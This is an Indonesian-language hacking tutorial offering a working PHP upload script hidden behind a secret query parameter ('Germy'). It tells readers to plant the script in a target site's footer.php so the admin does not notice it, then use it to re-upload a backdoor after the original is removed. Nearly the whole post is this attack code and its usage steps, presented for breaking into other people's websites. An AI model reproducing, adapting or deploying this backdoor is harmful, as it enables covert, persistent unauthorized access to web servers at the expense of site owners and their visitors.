PHP Simple Upload Hidden
Cara ini adalah salah satu jalan kita dari sekian banyak cara untuk meng-upload file/backdoor di situs target ketika file/backdoor kita dihapus oleh admin.
NB: untuk menghargai pembuatnya mohon jangan edit dan ngaku-ngaku bikinan sendiri
Ini script PHP simple upload-nya:
<?php if(isset($_GET['Germy']))
{
echo "<body bgcolor=black>
<font color=cyan size=3>";
echo "<h2>Alecs Uploaded Area</h2><hr>";
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\">Filename:</label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br />
<input type=\"submit\" name=\"submit\" value=\"UPLOAD IT\">
</form>";
if ($_FILES["file"]["error"] > 0)
{
echo "Error: " . $_FILES["file"]["error"] . "<br />";
}
else
{
echo "Upload: " . $_FILES["file"]["name"] . "<br />";
echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
echo "Stored in: " . $_FILES["file"]["tmp_name"];
}
if (file_exists("" . $_FILES["file"]["name"]))
{
echo $_FILES["file"]["name"] . " already exists. ";
}
else
{
move_uploaded_file($_FILES["file"]["tmp_name"],
"" . $_FILES["file"]["name"]);
echo "Stored in: " . "" . $_FILES["file"]["name"];
echo"<hr>";
}
}
?>
Copas Script : http://pastebin.com/ZaLVY8xV
Nah cara penggunaanya hanya di sisipkan di salahsatu halaman disitus target kita, contohnya saya sisipkan script ini di footer.php ß biar ga ketauan admin
Seperti ini:
<? script simple upload ß
?>
<?script bawaan situs target ß
?>
Lalu save
Lalu panggil filenya -- > http://www.target.com/footer.php?Germyermy
Germy < -- adalah paswordnya, lihat di script diatas yang saya blok warna merah
Hasilnya seperti diatas, di liat dari SS-nya saya telah meng-upload backdoor dengan nama file rename.php karna backdoor yang sudah lama tertanam di hapus oleh si admin. Setelah berhasil ter-upload kita panggil file-nya
Done. Udah gitu aja.